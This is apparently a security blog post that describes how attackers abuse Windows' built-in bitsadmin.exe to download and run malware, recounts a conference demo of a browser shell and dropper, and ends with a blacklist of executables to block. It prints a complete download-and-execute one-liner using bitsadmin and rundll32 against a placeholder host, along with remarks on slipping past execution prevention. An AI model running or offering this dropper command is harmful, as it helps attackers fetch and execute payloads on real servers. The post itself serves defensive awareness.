bitnuts.de logo   Downloads About Contact

bitsadmin.exe: Microsoft’s built in Malware Dropper?

Marcus Murray has shown how hackers can gain access to a Windows-Server through a combination of weak upload sanity checks and missing execution prevention on the Server. In his detailed presentation he showed how to create a cmd shell on a server that pipes I/O to the hacker’s browser (a.k.a. Browser Shell). The next problem to solve was to upload and execute code using this cmd shell (what he needed was a malware dropper).

He has managed to compile C# code (featuring a simple EXE Dropper) through the cmd shell and was able to execute this executable. It then downloaded and executed a metasploit generated sort of trojan executable from the web. At the end he fully controlled the Windows-Server and was able to dig deep into the network. It was a really cool show case on different techniques hackers combine to attack targets nowadays.

I really liked Murray’s idea of building an on the fly dropper using C# code, then building an executable out of it and starting this executable on the attacked site to download the intended malware. Until now I thought this is one of the smartest ways to get foreign executables downloaded and started, if you do not want to use an in-memory exploit by using all the well known dropping and executing stuff in win32-API. Well, I was wrong.

While analyzing some malware I stumbled over a really clever way to achieve the same thing Murray was doing, but with less steps to perform. Microsoft ships a tool called bitsadmin.exe. With this tool you can download arbitrary files from the Internet. Thus you can also download an executable and then execute it. Well, you could do something like:

cmd.exe /c bitsadmin /transfer transaction /download /priority HIGH hxxp://xx.xx.xx.xx/Injected.dll %temp%\a.dll >NUL & rundll32 %temp%\a.dll,0

This simple line downloads a DLL and starts it with rundll32.exe. Instead of a DLL you could also use an EXE, but I prefer DLLs because they are most likely not blocked by many execution prevention systems on the market in their default configuration. So there is a good chance to pass by, without getting trouble.

Besides the fact that you are able to directly download any file you like, this has also enormous impact for zero days. Analyzing many of them I often see sophisticated exploit code trying to obtain library calling addresses of URLDownloadToFile, WSARecv, recv, recvfrom, InternetReadFileExA, CreateProcess, ShellExecute, LoadLibrary, CreateFile, etc. just to download and run an executable. Well, using this technology attackers will save a damn bunch of such API calls. All they need to do is to call shellexec with the line above. This is awesomely smart.

This is not just a PoC or just a nice idea. I have seen it in the wild, it is already used by attackers. So beware and watch out for bitsadmin.exe. I would highly recommend to delete or blacklist this executable on your Servers (SOHO Windows, too) if you do not make use of it. By the way, you should additionally blacklist *script.exe, *vbc.exe, *jsc.exe, *ilasm.exe, *csc.exe, *build*, *powershell.exe, *hh.exe, *msiexec.exe. Well, I know sometimes you need one of these executables, but to be honest: In most scenarios you do not. And for everyday word and excel business you again do not need these executables. Protect your system, use black-/whitelisting or SRPs. For more details on what you achieve in level of protection see four simple strategies to mitigate 85% of threats.